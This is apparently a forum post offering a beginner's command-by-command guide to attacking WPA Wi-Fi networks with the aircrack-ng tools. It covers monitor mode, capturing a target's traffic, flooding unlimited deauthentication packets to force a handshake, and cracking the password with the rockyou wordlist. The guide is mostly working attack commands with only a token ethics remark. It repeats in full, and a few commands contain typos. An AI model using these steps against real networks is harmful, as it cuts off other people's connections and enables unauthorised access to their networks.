Jul 19, 2024, 07:46 PM
I thought I did this awhile back but neway...today I wanted to share a basic guide and list of commands for anyone who wants to use airmon-ng. Open to feedback/criticism, but I think it may be a helpful reference for those just getting started. Use your powers responsably and stuff
STEP 1
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && sudo airodump-ng wlan0mon (I ususally run this as a shell script. Please note that your network interface may be different than wlan0/wlan0mon)
Record BSSID and Channel # (Ch) of target network
Optional: sudo airodmp-ng wlan0mon-d [insert bssid] to display only that access point.
STEP 2
sudo airodump-ng -w [insert desired file name]-c [channel number] --bssid [insert bssid] wlan0mon
(example: sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon)
Open another terminal, run the following:
sudo aireplay-ng --deauth 0 -a [bssid] wlan0mon
(0 = unlimited deauth packets sent)
Wait for WPA handshake to be confirmed. It should show this on the terminal running airodump
Ctrl + c to stop
STEP 3
Optional: Open the .cap file in wireshark to see the authentication packets/handshake. Type "eapol" to find it
(example: open terminal, run sudo wireshark hack1-01.cap)
TURN OFF MONITOR MODE or reboot computer to get your internet back
sudo airmon-ng stop wlan0mon
Now crack it (wordlist version)
sudo aircrack-ng [insert .cap file name] -w [insert wordlist filepath]
( sudo aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt)
STEP 1
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && sudo airodump-ng wlan0mon (I ususally run this as a shell script. Please note that your network interface may be different than wlan0/wlan0mon)
Record BSSID and Channel # (Ch) of target network
Optional: sudo airodmp-ng wlan0mon-d [insert bssid] to display only that access point.
STEP 2
sudo airodump-ng -w [insert desired file name]-c [channel number] --bssid [insert bssid] wlan0mon
(example: sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon)
Open another terminal, run the following:
sudo aireplay-ng --deauth 0 -a [bssid] wlan0mon
(0 = unlimited deauth packets sent)
Wait for WPA handshake to be confirmed. It should show this on the terminal running airodump
Ctrl + c to stop
STEP 3
Optional: Open the .cap file in wireshark to see the authentication packets/handshake. Type "eapol" to find it
(example: open terminal, run sudo wireshark hack1-01.cap)
TURN OFF MONITOR MODE or reboot computer to get your internet back
sudo airmon-ng stop wlan0mon
Now crack it (wordlist version)
sudo aircrack-ng [insert .cap file name] -w [insert wordlist filepath]
( sudo aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt)